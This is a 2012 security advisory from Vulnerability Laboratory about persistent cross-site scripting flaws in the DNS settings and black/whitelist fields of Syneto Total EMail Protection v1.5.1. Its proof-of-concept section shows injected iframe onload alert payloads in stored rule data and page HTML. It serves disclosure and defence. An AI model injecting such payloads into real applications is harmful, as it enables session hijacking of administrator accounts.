Syneto EMail Protection v1.5.1 - Multiple Web Vulnerabilities

2012-06-24T00:00:00
ID VULNERLAB:547
Type vulnerlab
Reporter Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Modified 2012-06-24T00:00:00

Description

                                        
                                            Document Title:
===============
Syneto EMail Protection v1.5.1 - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=547


Release Date:
=============
2012-06-24


Vulnerability Laboratory ID (VL-ID):
====================================
547


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Email Protection is a powerful perimeter email anti-malware product. It fights spam, viruses, zombies 
and phishing attacks, provides realtime updates and powerful reporting capabilities that help prevent 
email threats from reaching your computers, thus reducing costs and increasing productivity.
The web content filter helps ensure that employees access only those resources that help them accomplish 
work related activities. Access to time wasting social networks like Twitter and Facebook can be restricted 
or completely eliminated. Internet crime is at an all-time high. There are thousands of sites that try to 
steal credit card information or install viruses and spyware programs on your computer. Sadly, at the rate 
that they are appearing, anything less than a fully automated solution won’t catch them. By blocking malware 
websites using Web Protection, you make sure nobody will ever access them, and lower the risk for data 
and financial losses. Legislation makes it the company’s responsibility to ensure a safe environment for the 
employees. That includes restricting access to potentially illegal resources and websites. The Application 
Filter can block downloads from P2P networks (torrents, aMule etc.) or via Instant Messengers. A lot of similar 
products are built by highly technical engineers and as such, lack attention to regular users who a lot of 
times are frustrated by seemingly impossible configuration interfaces. Our development philosophy emphasizes 
ease of use, so we spend a lot of time doing usability studies that help us create easy to use, yet powerful 
products. Configuring and deploying such a product can be a real challenge in more complex environments. We 
offer professional technical support to all our customers, thus making sure they get from zero to a fully 
functioning installation in the shortest time possible. Each business is unique and so is their I.T. infrastructure. 
Our customers demand ease of integration into existing networks. Web Protection can be deployed in a variety 
of scenarios, thanks to its ability to come in several versions (hardware, software and virtualized).

(Copy of the Vendor Homepage: http://syneto.net/network-security/email-protection )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Researcher Team discovered multiple web vulnerabilities in Syneto Total EMail Protection Appliance v1.5.1 PE.


Vulnerability Disclosure Timeline:
==================================
2012-05-04:	Researcher Notification & Coordination
2012-05-15:	Vendor Notification
2012-05-28:	Vendor Response/Feedback
2012-06-25:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================
Syneto
Product: Total EMail Protection 1.5.1 Professional Edition


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities are detected in Syneto Total EMail Protection Appliance v1.5.1 PE.
The bugs allow remote attackers to implement/inject malicious script code on the application-side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) 
context manipulation. Exploitation requires high privileged user account or system access.


Vulnerable Module(s):
				[+] NameServer - DNS Servers Settings & Display
				[+] Black- & WhiteList  - Input Fields & Output Listing

Picture(s):
				../1.png
				../2.png


Proof of Concept (PoC):
=======================
The persistent input validation vulnerabilities can be exploited by high privileged user accounts. For demonstration or reproduce ...

Review: Black- & Whitelist - Listing

blacklistRules[protocol] = 
{"1":{"id":"1","sender_type":"any","sender":"","recipient_type":"email","recipient":"\"><iframe
 src=a onload=alert(\"VL\") <@aol.com"}};
	whitelistRules[protocol] = 
{"1":{"id":"1","sender_type":"email","sender":"contact@syneto.net","recipient_type":"any","recipient":"",
"skip_greylist":false,"skip_antispam":true,"skip_antivirus":false,"whitelistedEngines":"Spam"},"2":
{"id":"2","sender_type":"email","sender":"*@syneto.net","recipient_type":"any","recipient":"","skip_greylist"
:true,"skip_antispam":false,"skip_antivirus":false,"whitelistedEngines":"Greylist"}};

URL:	https://ep.127.0.0.1:8080/syneto.php?menuid=312


Review: NameServer - DNS Servers Settings & Display

<p>
<label for="fqdn" class="left_label">FQDN:</label>
<input id="fqdn" name="fqdn"><iframe src="syneto.php-Dateien/a.htm" onload='alert("VL")' <"="">
<img src='img/help.gif' title="Fully Qualified Domain Name using 
the 'hostname.domainname' format. Domain name is optional." 
class='tooltip' />
<br class='clearer' />
</p>
</fieldset>
<fieldset>

URL:	https://ep.127.0.0.1:8080/syneto.php?menuid=10


Solution - Fix & Patch:
=======================
The vulnerabilities will be patched by the product vendor with the next firmware update.

Syneto Ticket ID:  2601


Security Risk:
==============
The security risk of the persistent input validation vulnerabilities are estimated as medium(-)|low(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory